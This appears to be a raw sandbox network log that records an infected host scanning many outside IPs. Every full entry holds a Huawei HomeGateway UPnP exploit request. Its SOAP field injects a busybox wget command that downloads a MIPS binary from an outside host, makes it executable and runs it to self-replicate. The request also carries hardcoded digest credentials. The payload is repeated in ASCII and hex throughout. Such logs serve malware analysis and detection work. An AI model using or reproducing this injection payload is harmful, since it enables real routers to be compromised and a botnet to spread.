                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1931192.168.2.154803472.223.36.24537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.020486116 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1932192.168.2.1536676197.209.90.7037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.020504951 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1933192.168.2.153907641.86.244.12837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.020536900 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1934192.168.2.156021441.14.35.15037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.020605087 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1935192.168.2.1536594197.6.137.7937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.020628929 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1936192.168.2.1545002197.154.21.25437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.020643950 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1937192.168.2.1539066197.104.210.8137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.020679951 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1938192.168.2.155801490.221.81.12737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.020708084 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1939192.168.2.1540092197.176.40.8237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.020716906 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1940192.168.2.1534678197.81.93.13237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.025423050 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1941192.168.2.1545560197.222.226.13237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.025449038 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
